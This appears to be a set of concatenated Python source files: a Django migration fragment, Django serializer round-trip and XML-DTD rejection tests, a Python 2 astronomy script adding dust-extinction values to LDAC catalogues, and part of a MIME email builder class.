(\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'moderation_log\'"", \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.userwarning\': {\n \'Meta\': {\'object_name\': \'UserWarning\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'to\': ""orm[\'canvas.Comment\']"", \'null\': \'True\', \'blank\': \'True\'}),\n \'confirmed\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'}),\n \'custom_message\': (\'django.db.models.fields.TextField\', [], {}),\n \'disable_user\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'issued\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'stock_message\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'user_warnings\'"", \'to\': ""orm[\'auth.User\']""}),\n \'viewed\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'})\n },\n \'canvas.welcomeemailrecipient\': {\n \'Meta\': {\'object_name\': \'WelcomeEmailRecipient\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'recipient\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']"", \'unique\': \'True\'})\n },\n \'contenttypes.contenttype\': {\n \'Meta\': {\'ordering\': ""(\'name\',)"", \'unique_together\': ""((\'app_label\', \'model\'),)"", \'object_name\': \'ContentType\', \'db_table\': ""\'django_content_type\'""},\n \'app_label\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'model\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'})\n }\n }\n\n complete_apps = [\'canvas\']\n', '""""""\nA test spanning all the capabilities of all the serializers.\n\nThis class defines sample data and a dynamically generated\ntest case that is capable of testing the capabilities of\nthe serializers. This includes all valid data values, plus\nforward, backwards and self references.\n""""""\nfrom __future__ import unicode_literals\n\nimport datetime\nimport decimal\nfrom unittest import expectedFailure, skipUnless\n\ntry:\n import yaml\nexcept ImportError:\n yaml = None\n\nfrom django.core import serializers\nfrom django.core.serializers import SerializerDoesNotExist\nfrom django.core.serializers.base import DeserializationError\nfrom django.core.serializers.xml_serializer import DTDForbidden\nfrom django.db import connection, models\nfrom django.http import HttpResponse\nfrom django.test import TestCase\nfrom django.utils import six\nfrom django.utils.encoding import force_text\nfrom django.utils.functional import curry\n\nfrom .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData,\n FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData,\n GenericIPAddressData, NullBooleanData, PositiveIntegerData,\n PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData,\n GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData,\n FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData,\n Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData,\n DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData,\n GenericIPAddressPKData, PositiveIntegerPKData,\n PositiveSmallIntegerPKData, SlugPKData, SmallPKData,\n AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel,\n ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel,\n ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel,\n NaturalKeyAnchor, FKDataNaturalKey)\n\n# A set of functions that can be used to recreate\n# test data objects of various kinds.\n# The save method is a raw base model save, to make\n# sure that the data in the database matches the\n# exact test case.\ndef data_create(pk, klass, data):\n instance = klass(id=pk)\n instance.data = data\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef generic_create(pk, klass, data):\n instance = klass(id=pk)\n instance.data = data[0]\n models.Model.save_base(instance, raw=True)\n for tag in data[1:]:\n instance.tags.create(data=tag)\n return [instance]\n\ndef fk_create(pk, klass, data):\n instance = klass(id=pk)\n setattr(instance, \'data_id\', data)\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef m2m_create(pk, klass, data):\n instance = klass(id=pk)\n models.Model.save_base(instance, raw=True)\n instance.data = data\n return [instance]\n\ndef im2m_create(pk, klass, data):\n instance = klass(id=pk)\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef im_create(pk, klass, data):\n instance = klass(id=pk)\n instance.right_id = data[\'right\']\n instance.left_id = data[\'left\']\n if \'extra\' in data:\n instance.extra = data[\'extra\']\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef o2o_create(pk, klass, data):\n instance = klass()\n instance.data_id = data\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef pk_create(pk, klass, data):\n instance = klass()\n instance.data = data\n models.Model.save_base(instance, raw=True)\n return [instance]\n\ndef inherited_create(pk, klass, data):\n instance = klass(id=pk,**data)\n # This isn\'t a raw save because:\n # 1) we\'re testing inheritance, not field behavior, so none\n # of the field values need to be protected.\n # 2) saving the child class and having the parent created\n # automatically is easier than manually creating both.\n models.Model.save(instance)\n created = [instance]\n for klass,field in instance._meta.parents.items():\n created.append(klass.objects.get(id=pk))\n return created\n\n# A set of functions that can be used to compare\n# test data objects of various kinds\ndef data_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n if klass == BinaryData and data is not None:\n testcase.assertEqual(bytes(data), bytes(instance.data),\n ""Objects with PK=%d not equal; expected \'%s\' (%s), got \'%s\' (%s)"" % (\n pk, repr(bytes(data)), type(data), repr(bytes(instance.data)),\n type(instance.data))\n )\n else:\n testcase.assertEqual(data, instance.data,\n ""Objects with PK=%d not equal; expected \'%s\' (%s), got \'%s\' (%s)"" % (\n pk, data, type(data), instance, type(instance.data))\n )\n\ndef generic_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data[0], instance.data)\n testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by(\'id\')])\n\ndef fk_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data, instance.data_id)\n\ndef m2m_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data, [obj.id for obj in instance.data.order_by(\'id\')])\n\ndef im2m_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n #actually nothing else to check, the instance just should exist\n\ndef im_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n testcase.assertEqual(data[\'left\'], instance.left_id)\n testcase.assertEqual(data[\'right\'], instance.right_id)\n if \'extra\' in data:\n testcase.assertEqual(data[\'extra\'], instance.extra)\n else:\n testcase.assertEqual(""doesn\'t matter"", instance.extra)\n\ndef o2o_compare(testcase, pk, klass, data):\n instance = klass.objects.get(data=data)\n testcase.assertEqual(data, instance.data_id)\n\ndef pk_compare(testcase, pk, klass, data):\n instance = klass.objects.get(data=data)\n testcase.assertEqual(data, instance.data)\n\ndef inherited_compare(testcase, pk, klass, data):\n instance = klass.objects.get(id=pk)\n for key,value in data.items():\n testcase.assertEqual(value, getattr(instance,key))\n\n# Define some data types. Each data type is\n# actually a pair of functions; one to create\n# and one to compare objects of that type\ndata_obj = (data_create, data_compare)\ngeneric_obj = (generic_create, generic_compare)\nfk_obj = (fk_create, fk_compare)\nm2m_obj = (m2m_create, m2m_compare)\nim2m_obj = (im2m_create, im2m_compare)\nim_obj = (im_create, im_compare)\no2o_obj = (o2o_create, o2o_compare)\npk_obj = (pk_create, pk_compare)\ninherited_obj = (inherited_create, inherited_compare)\n\ntest_data = [\n # Format: (data type, PK value, Model Class, data)\n (data_obj, 1, BinaryData, six.memoryview(b""\\x05\\xFD\\x00"")),\n (data_obj, 2, BinaryData, None),\n (data_obj, 5, BooleanData, True),\n (data_obj, 6, BooleanData, False),\n (data_obj, 10, CharData, ""Test Char Data""),\n (data_obj, 11, CharData, """"),\n (data_obj, 12, CharData, ""None""),\n (data_obj, 13, CharData, ""null""),\n (data_obj, 14, CharData, ""NULL""),\n (data_obj, 15, CharData, None),\n # (We use something that will fit into a latin1 database encoding here,\n # because that is still the default used on many system setups.)\n (data_obj, 16, CharData, \'\\xa5\'),\n (data_obj, 20, DateData, datetime.date(2006,6,16)),\n (data_obj, 21, DateData, None),\n (data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)),\n (data_obj, 31, DateTimeData, None),\n (data_obj, 40, EmailData, dummy@email.com""),\n (data_obj, 41, EmailData, None),\n (data_obj, 42, EmailData, """"),\n (data_obj, 50, FileData, \'file:///foo/bar/whiz.txt\'),\n# (data_obj, 51, FileData, None),\n (data_obj, 52, FileData, """"),\n (data_obj, 60, FilePathData, ""/foo/bar/whiz.txt""),\n (data_obj, 61, FilePathData, None),\n (data_obj, 62, FilePathData, """"),\n (data_obj, 70, DecimalData, decimal.Decimal(\'12.345\')),\n (data_obj, 71, DecimalData, decimal.Decimal(\'-12.345\')),\n (data_obj, 72, DecimalData, decimal.Decimal(\'0.0\')),\n (data_obj, 73, DecimalData, None),\n (data_obj, 74, FloatData, 12.345),\n (data_obj, 75, FloatData, -12.345),\n (data_obj, 76, FloatData, 0.0),\n (data_obj, 77, FloatData, None),\n (data_obj, 80, IntegerData, 123456789),\n (data_obj, 81, IntegerData, -123456789),\n (data_obj, 82, IntegerData, 0),\n (data_obj, 83, IntegerData, None),\n #(XX, ImageData\n (data_obj, 90, IPAddressData, ""127.0.0.1""),\n (data_obj, 91, IPAddressData, None),\n (data_obj, 95, GenericIPAddressData, ""127.0.0.1""),\n (data_obj, 96, GenericIPAddressData, None),\n (data_obj, 100, NullBooleanData, True),\n (data_obj, 101, NullBooleanData, False),\n (data_obj, 102, NullBooleanData, None),\n (data_obj, 120, PositiveIntegerData, 123456789),\n (data_obj, 121, PositiveIntegerData, None),\n (data_obj, 130, PositiveSmallIntegerData, 12),\n (data_obj, 131, PositiveSmallIntegerData, None),\n (data_obj, 140, SlugData, ""this-is-a-slug""),\n (data_obj, 141, SlugData, None),\n (data_obj, 142, SlugData, """"),\n (data_obj, 150, SmallData, 12),\n (data_obj, 151, SmallData, -12),\n (data_obj, 152, SmallData, 0),\n (data_obj, 153, SmallData, None),\n (data_obj, 160, TextData, """"""This is a long piece of text.\nIt contains line breaks.\nSeveral of them.\nThe end.""""""),\n (data_obj, 161, TextData, """"),\n (data_obj, 162, TextData, None),\n (data_obj, 170, TimeData, datetime.time(10,42,37)),\n (data_obj, 171, TimeData, None),\n\n (generic_obj, 200, GenericData, [\'Generic Object 1\', \'tag1\', \'tag2\']),\n (generic_obj, 201, GenericData, [\'Generic Object 2\', \'tag2\', \'tag3\']),\n\n (data_obj, 300, Anchor, ""Anchor 1""),\n (data_obj, 301, Anchor, ""Anchor 2""),\n (data_obj, 302, UniqueAnchor, ""UAnchor 1""),\n\n (fk_obj, 400, FKData, 300), # Post reference\n (fk_obj, 401, FKData, 500), # Pre reference\n (fk_obj, 402, FKData, None), # Empty reference\n\n (m2m_obj, 410, M2MData, []), # Empty set\n (m2m_obj, 411, M2MData, [300,301]), # Post reference\n (m2m_obj, 412, M2MData, [500,501]), # Pre reference\n (m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference\n\n (o2o_obj, None, O2OData, 300), # Post reference\n (o2o_obj, None, O2OData, 500), # Pre reference\n\n (fk_obj, 430, FKSelfData, 431), # Pre reference\n (fk_obj, 431, FKSelfData, 430), # Post reference\n (fk_obj, 432, FKSelfData, None), # Empty reference\n\n (m2m_obj, 440, M2MSelfData, []),\n (m2m_obj, 441, M2MSelfData, []),\n (m2m_obj, 442, M2MSelfData, [440, 441]),\n (m2m_obj, 443, M2MSelfData, [445, 446]),\n (m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]),\n (m2m_obj, 445, M2MSelfData, []),\n (m2m_obj, 446, M2MSelfData, []),\n\n (fk_obj, 450, FKDataToField, ""UAnchor 1""),\n (fk_obj, 451, FKDataToField, ""UAnchor 2""),\n (fk_obj, 452, FKDataToField, None),\n\n (fk_obj, 460, FKDataToO2O, 300),\n\n (im2m_obj, 470, M2MIntermediateData, None),\n\n #testing post- and prereferences and extra fields\n (im_obj, 480, Intermediate, {\'right\': 300, \'left\': 470}),\n (im_obj, 481, Intermediate, {\'right\': 300, \'left\': 490}),\n (im_obj, 482, Intermediate, {\'right\': 500, \'left\': 470}),\n (im_obj, 483, Intermediate, {\'right\': 500, \'left\': 490}),\n (im_obj, 484, Intermediate, {\'right\': 300, \'left\': 470, \'extra\': ""extra""}),\n (im_obj, 485, Intermediate, {\'right\': 300, \'left\': 490, \'extra\': ""extra""}),\n (im_obj, 486, Intermediate, {\'right\': 500, \'left\': 470, \'extra\': ""extra""}),\n (im_obj, 487, Intermediate, {\'right\': 500, \'left\': 490, \'extra\': ""extra""}),\n\n (im2m_obj, 490, M2MIntermediateData, []),\n\n (data_obj, 500, Anchor, ""Anchor 3""),\n (data_obj, 501, Anchor, ""Anchor 4""),\n (data_obj, 502, UniqueAnchor, ""UAnchor 2""),\n\n (pk_obj, 601, BooleanPKData, True),\n (pk_obj, 602, BooleanPKData, False),\n (pk_obj, 610, CharPKData, ""Test Char PKData""),\n# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)),\n# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)),\n (pk_obj, 640, EmailPKData, dummy@email.com""),\n# (pk_obj, 650, FilePKData, \'file:///foo/bar/whiz.txt\'),\n (pk_obj, 660, FilePathPKData, ""/foo/bar/whiz.txt""),\n (pk_obj, 670, DecimalPKData, decimal.Decimal(\'12.345\')),\n (pk_obj, 671, DecimalPKData, decimal.Decimal(\'-12.345\')),\n (pk_obj, 672, DecimalPKData, decimal.Decimal(\'0.0\')),\n (pk_obj, 673, FloatPKData, 12.345),\n (pk_obj, 674, FloatPKData, -12.345),\n (pk_obj, 675, FloatPKData, 0.0),\n (pk_obj, 680, IntegerPKData, 123456789),\n (pk_obj, 681, IntegerPKData, -123456789),\n (pk_obj, 682, IntegerPKData, 0),\n# (XX, ImagePKData\n (pk_obj, 690, IPAddressPKData, ""127.0.0.1""),\n (pk_obj, 695, GenericIPAddressPKData, ""127.0.0.1""),\n # (pk_obj, 700, NullBooleanPKData, True),\n # (pk_obj, 701, NullBooleanPKData, False),\n (pk_obj, 720, PositiveIntegerPKData, 123456789),\n (pk_obj, 730, PositiveSmallIntegerPKData, 12),\n (pk_obj, 740, SlugPKData, ""this-is-a-slug""),\n (pk_obj, 750, SmallPKData, 12),\n (pk_obj, 751, SmallPKData, -12),\n (pk_obj, 752, SmallPKData, 0),\n# (pk_obj, 760, TextPKData, """"""This is a long piece of text.\n# It contains line breaks.\n# Several of them.\n# The end.""""""),\n# (pk_obj, 770, TimePKData, datetime.time(10,42,37)),\n# (pk_obj, 790, XMLPKData, """"),\n\n (data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),\n (data_obj, 810, ModifyingSaveData, 42),\n\n (inherited_obj, 900, InheritAbstractModel, {\'child_data\':37,\'parent_data\':42}),\n (inherited_obj, 910, ExplicitInheritBaseModel, {\'child_data\':37,\'parent_data\':42}),\n (inherited_obj, 920, InheritBaseModel, {\'child_data\':37,\'parent_data\':42}),\n\n (data_obj, 1000, BigIntegerData, 9223372036854775807),\n (data_obj, 1001, BigIntegerData, -9223372036854775808),\n (data_obj, 1002, BigIntegerData, 0),\n (data_obj, 1003, BigIntegerData, None),\n (data_obj, 1004, LengthModel, 0),\n (data_obj, 1005, LengthModel, 1),\n]\n\nnatural_key_test_data = [\n (data_obj, 1100, NaturalKeyAnchor, ""Natural Key Anghor""),\n (fk_obj, 1101, FKDataNaturalKey, 1100),\n (fk_obj, 1102, FKDataNaturalKey, None),\n]\n\n# Because Oracle treats the empty string as NULL, Oracle is expected to fail\n# when field.empty_strings_allowed is True and the value is None; skip these\n# tests.\nif connection.features.interprets_empty_strings_as_nulls:\n test_data = [data for data in test_data\n if not (data[0] == data_obj and\n data[2]._meta.get_field(\'data\').empty_strings_allowed and\n data[3] is None)]\n\n# Regression test for #8651 -- a FK to an object iwth PK of 0\n# This won\'t work on MySQL since it won\'t let you create an object\n# with a primary key of 0,\nif connection.features.allows_primary_key_0:\n test_data.extend([\n (data_obj, 0, Anchor, ""Anchor 0""),\n (fk_obj, 465, FKData, 0),\n ])\n\n# Dynamically create serializer tests to ensure that all\n# registered serializers are automatically tested.\nclass SerializerTests(TestCase):\n def test_get_unknown_serializer(self):\n """"""\n #15889: get_serializer(\'nonsense\') raises a SerializerDoesNotExist\n """"""\n with self.assertRaises(SerializerDoesNotExist):\n serializers.get_serializer(""nonsense"")\n\n with self.assertRaises(KeyError):\n serializers.get_serializer(""nonsense"")\n\n # SerializerDoesNotExist is instantiated with the nonexistent format\n with self.assertRaises(SerializerDoesNotExist) as cm:\n serializers.get_serializer(""nonsense"")\n self.assertEqual(cm.exception.args, (""nonsense"",))\n\n def test_unregister_unkown_serializer(self):\n with self.assertRaises(SerializerDoesNotExist):\n serializers.unregister_serializer(""nonsense"")\n\n def test_get_unkown_deserializer(self):\n with self.assertRaises(SerializerDoesNotExist):\n serializers.get_deserializer(""nonsense"")\n\n def test_json_deserializer_exception(self):\n with self.assertRaises(DeserializationError):\n for obj in serializers.deserialize(""json"", """"""[{""pk"":1}""""""):\n pass\n\n @skipUnless(yaml, ""PyYAML not installed"")\n def test_yaml_deserializer_exception(self):\n with self.assertRaises(DeserializationError):\n for obj in serializers.deserialize(""yaml"", ""{""):\n pass\n\n def test_serialize_proxy_model(self):\n BaseModel.objects.create(parent_data=1)\n base_objects = BaseModel.objects.all()\n proxy_objects = ProxyBaseModel.objects.all()\n proxy_proxy_objects = ProxyProxyBaseModel.objects.all()\n base_data = serializers.serialize(""json"", base_objects)\n proxy_data = serializers.serialize(""json"", proxy_objects)\n proxy_proxy_data = serializers.serialize(""json"", proxy_proxy_objects)\n self.assertEqual(base_data, proxy_data.replace(\'proxy\', \'\'))\n self.assertEqual(base_data, proxy_proxy_data.replace(\'proxy\', \'\'))\n\n\ndef serializerTest(format, self):\n\n # Create all the objects defined in the test data\n objects = []\n instance_count = {}\n for (func, pk, klass, datum) in test_data:\n with connection.constraint_checks_disabled():\n objects.extend(func[0](pk, klass, datum))\n\n # Get a count of the number of objects created for each class\n for klass in instance_count:\n instance_count[klass] = klass.objects.count()\n\n # Add the generic tagged objects to the object list\n objects.extend(Tag.objects.all())\n\n # Serialize the test database\n serialized_data = serializers.serialize(format, objects, indent=2)\n\n for obj in serializers.deserialize(format, serialized_data):\n obj.save()\n\n # Assert that the deserialized data is the same\n # as the original source\n for (func, pk, klass, datum) in test_data:\n func[1](self, pk, klass, datum)\n\n # Assert that the number of objects deserialized is the\n # same as the number that was serialized.\n for klass, count in instance_count.items():\n self.assertEqual(count, klass.objects.count())\n\nif connection.vendor == \'mysql\' and six.PY3:\n # Existing MySQL DB-API drivers fail on binary data.\n serializerTest = expectedFailure(serializerTest)\n\n\ndef naturalKeySerializerTest(format, self):\n # Create all the objects defined in the test data\n objects = []\n instance_count = {}\n for (func, pk, klass, datum) in natural_key_test_data:\n with connection.constraint_checks_disabled():\n objects.extend(func[0](pk, klass, datum))\n\n # Get a count of the number of objects created for each class\n for klass in instance_count:\n instance_count[klass] = klass.objects.count()\n\n # Serialize the test database\n serialized_data = serializers.serialize(format, objects, indent=2,\n use_natural_keys=True)\n\n for obj in serializers.deserialize(format, serialized_data):\n obj.save()\n\n # Assert that the deserialized data is the same\n # as the original source\n for (func, pk, klass, datum) in natural_key_test_data:\n func[1](self, pk, klass, datum)\n\n # Assert that the number of objects deserialized is the\n # same as the number that was serialized.\n for klass, count in instance_count.items():\n self.assertEqual(count, klass.objects.count())\n\ndef fieldsTest(format, self):\n obj = ComplexModel(field1=\'first\', field2=\'second\', field3=\'third\')\n obj.save_base(raw=True)\n\n # Serialize then deserialize the test database\n serialized_data = serializers.serialize(format, [obj], indent=2, fields=(\'field1\',\'field3\'))\n result = next(serializers.deserialize(format, serialized_data))\n\n # Check that the deserialized object contains data in only the serialized fields.\n self.assertEqual(result.object.field1, \'first\')\n self.assertEqual(result.object.field2, \'\')\n self.assertEqual(result.object.field3, \'third\')\n\ndef streamTest(format, self):\n obj = ComplexModel(field1=\'first\',field2=\'second\',field3=\'third\')\n obj.save_base(raw=True)\n\n # Serialize the test database to a stream\n for stream in (six.StringIO(), HttpResponse()):\n serializers.serialize(format, [obj], indent=2, stream=stream)\n\n # Serialize normally for a comparison\n string_data = serializers.serialize(format, [obj], indent=2)\n\n # Check that the two are the same\n if isinstance(stream, six.StringIO):\n self.assertEqual(string_data, stream.getvalue())\n else:\n self.assertEqual(string_data, stream.content.decode(\'utf-8\'))\n\nfor format in serializers.get_serializer_formats():\n setattr(SerializerTests, \'test_\' + format + \'_serializer\', curry(serializerTest, format))\n setattr(SerializerTests, \'test_\' + format + \'_natural_key_serializer\', curry(naturalKeySerializerTest, format))\n setattr(SerializerTests, \'test_\' + format + \'_serializer_fields\', curry(fieldsTest, format))\n if format != \'python\':\n setattr(SerializerTests, \'test_\' + format + \'_serializer_stream\', curry(streamTest, format))\n\n\nclass XmlDeserializerSecurityTests(TestCase):\n\n def test_no_dtd(self):\n """"""\n The XML deserializer shouldn\'t allow a DTD.\n\n This is the most straightforward way to prevent all entity definitions\n and avoid both external entities and entity-expansion attacks.\n\n """"""\n xml = \'\'\n with self.assertRaises(DTDForbidden):\n next(serializers.deserialize(\'xml\', xml))\n', 'import threading\n\ndef ebv_list(list_submit,list_dict,i,ppid): \n\timport os\n\tlineindex = 0\n timehold = time.time()\n\tlist_out = []\n\n\tout = open(\'/tmp/tmpf_\' + str(i) + \'_\' + str(ppid),\'w\')\n for line in list_submit:\n\t\ttt = re.split(\'\\s+\',line)\n \tra = float(tt[0])\n \tdec = float(tt[1])\n \tEBV = calc_EBV(float(ra),float(dec),i)\n\t\tlist_out.append(EBV)\n\t\t#print EBV\n\t\tlineindex += 1\n\t\tout.write(str(EBV) + \'\\n\')\n \tif lineindex % 100 == 0: \n \t\tprint \'thread \' + str(i), lineindex, len(list_submit), time.time() - timehold\n \t\ttimehold = time.time()\n\tlist_dict[str(i)][\'list_out\'] = list_out\n\tout.close()\n\ndef calc_EBV(coord_in_ra,coord_in_dec,i):\n\t\n\t#coord_in_ra=\'12:51:26.28\'\n #coord_in_dec=\'27:07:42.\'\n coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch=\'2000\') # input needs to be in HOURS as a STRING\n g = Galactic(coord, epoch=\'2000\') # output is in degrees not hours--it\'s latitude/longitude\n \n spt = re.split(\'\\:\',str(g.lat))\n #print spt, abs(float(spt[0])), float(spt[1])/60.\n gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )\n #print gallat\n #print g.long\n spt = re.split(\'\\:\',str(g.long))\n #print spt\n gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )\n #print gallong\n \n #coordtest = Equatorial(Galactic(g.long,g.lat, epoch=\'2000\'), epoch=\'2000\')\n \n output = commands.getoutput(\'dust_getval \' + str(gallong) + \' \' + str(gallat) + \' interp=y PI:KEY\' + str(i) ) \n spt = re.split(\'\\s\',output)\n\t#print spt\n EBV = spt[-1]\n\t#print EBV, float(coord_in_ra), float(coord_in_dec)\n\treturn EBV\n\nclass MyThread ( threading.Thread ):\n\tdef __init__ ( self, list_submit,list_dict, i, ppid):\n\t\tself.i = i\n\t\tself.list_submit = list_submit \n\t\tself.list_dict = list_dict\n\t\tself.ppid = ppid\n\t\tthreading.Thread.__init__(self)\t\n\n\tdef run ( self ):\n\t\tebv_list(self.list_submit,list_dict,self.i,self.ppid)\n\t return \n\n#add E(B-V) to ldac table\nimport re, commands, sys, bashreader, os\nfrom ephem import *\n\ndict = bashreader.parseFile(\'progs.ini\')\n\ntable = sys.argv[1]\n\nimport time\ntempfile = \'/tmp/outkey\'\nebvfile = \'/tmp/outebv\'\nos.system(\'rm \' + ebvfile)\nppid = os.getppid()\nprint ppid\ncommand = ""ldactoasc -b -i "" + table + "" -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > "" + ebvfile \nprint command\nos.system(command)\nlist = []\nimport re\noutkey=open(tempfile,\'w\')\nlines = open(ebvfile,\'r\').readlines()\nnumber_interval = 4\nlength_int = len(lines)/number_interval\nstart = 0\nmy_threads = []\nlist_dict = {}\nfor i in range(number_interval):\n\tend = start + length_int\n\tif i + 1 == number_interval:\n\t\tlist_submit = lines[start:]\n\telse:\n\t\tlist_submit = lines[start:end]\n\tstart = end\n\tlist_dict[str(i)] = {\'list_submit\':list_submit}\n\t#s = MyThread(list_submit,list_dict,i,ppid)\n\n\t#stat = os.fork()\n\tprint i, \'started\'\n\ts = os.fork()\n\tif not s:\n\t\tebv_list(list_submit,list_dict,i,ppid)\n\t\tsys.exit()\n\t#s.start()\t\n\tmy_threads.append(s)\n\nprint my_threads\n#print threading.enumerate()\nfor s in my_threads: \n \tos.waitpid(s,0)\n\nprint \'done\'\n\nlist_out = []\nfor i in range(number_interval):\n\tlist_out = list_out + list_dict[str(i)][\'list_out\']\n\nprint len(lines), len(list_out)\nprint lines[0:2], list_out[0:2]\n\t\n\t\n\n\n\n# READ IN COLUMN INFO\n\n\n\n\n\n\n\n\n\n\n\nfor val in list_out:\n\toutkey.write(str(val) + \'\\n\')\n\n\noutkey.close()\n\ncommand = ""asctoldac -i "" + tempfile + "" -o "" + tempfile + "".cat -c "" + dict[\'photconf\'] + ""/EBV.conf -t OBJECTS ""\nos.system(command)\n\ncommand = ""ldacjoinkey -o test -i "" + table + "" -p "" + tempfile + "".cat -t OBJECTS -k EBV"" \nos.system(command)\n\n', '#coding=utf-8\n\nimport smtplib\nfrom datetime import datetime\nfrom hashlib import md5\nimport sys, re\nfrom .misc import *\nfrom .parts import *\n\nfrom collections import OrderedDict as odict\n\nclass Mimemail():\n \n def __init__(self, **kwargs):\n self.headers = odict()\n self.headers[\'MIME-Version\'] = \'1.0\'\n self.headers[\'From\'] = MM_DEFAULT_FROM\n self.headers[\'Date\'] = datetime.utcnow().strftime(\'%a, %d %b %Y %H:%M:%S GMT\')\n \n self.body = \'\'\n self.html = None\n self.text = None\n self.images = []\n self.attachments = []\n self.charset = \'UTF-8\'\n self.recipients = {}\n self.from_email = \'root@localhost\'\n self.kw = kwargs\n \n def set_from(self, from_email, from_name):\n self.headers[\'From\'] = \'%s <%s>\' % (encode_header(from_name, self.charset), from_email)\n self.from_email = from_email\n \n def set_html(self, html):\n self.html = html\n \n def set_text(self, text):\n self.text = text\n \n def add_image(self, image):\n self.images.append(image)\n \n def add_attachment(self, att):\n self.attachments.append(att)\n \n def set_subject(self, subject):\n self.subject = subject\n\n def create_images_part(self, boundary):\n lines = []\n for image in self.images:\n lines.extend([\n MM_DEFAULT_CRLF,\n \'--%s%s\' % (boundary, MM_DEFAULT_CRLF),\n image.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n image.get_part_body()\n ])\n \n return \'\'.join(lines)\n \n def create_attachments_part(self, boundary):\n lines = []\n for att in self.attachments:\n lines.extend([\n MM_DEFAULT_CRLF,\n \'--%s%s\' % (boundary, MM_DEFAULT_CRLF),\n att.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n att.get_part_body()\n ])\n \n return \'\'.join(lines)\n \n def build(self):\n has_html = self.html != None\n has_text = self.text != None\n has_img = len(self.images) > 0\n has_att = len(self.attachments) > 0\n \n if has_text and not has_html:\n self.html = MimemailPartHtml(re.sub(r\'\\n\', \'
    \', self.text.plain_content, re.M | re.S), charset = self.charset)\n elif has_html and not has_text:\n self.text = MimemailPartText(re.sub(r\'<|>|/\', \'\', self.html.plain_content, re.M | re.S | re.U), charset = self.charset)\n elif not has_html and not has_text and not has_att:\n raise MimemailException(\'An email has no content to send\')\n \n if has_img:\n for image in self.images:\n src = image.get_file_path()\n dst = \'cid:\' + image.get_image_cid()\n self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst)\n \n boundary = \'alt_\' + gen_boundary_hash()\n self.headers[\'Content-Type\'] = \'multipart/alternative; boundary=""\' + boundary + \'""\'\n \n self.body = \'\'.join([\n \'--%s%s\' % ( boundary, MM_DEFAULT_CRLF ),\n self.text.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n self.text.get_part_body(),\n \'%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ),\n self.html.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n self.html.get_part_body(),\n \'%s--%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )\n ])\n \n if has_img:\n boundary = \'rel_\' + gen_boundary_hash()\n self.body = \'\'.join([\n \'--%s%s\' % ( boundary, MM_DEFAULT_CRLF ),\n \'Content-Type: %s%s%s\' % (self.headers[\'Content-Type\'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),\n self.body,\n self.create_images_part(boundary),\n \'%s--%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )\n ])\n self.headers[\'Content-Type\'] = \'multipart/related; boundary=""%s""\' % (boundary)\n \n if has_att:\n boundary = \'att_\' + 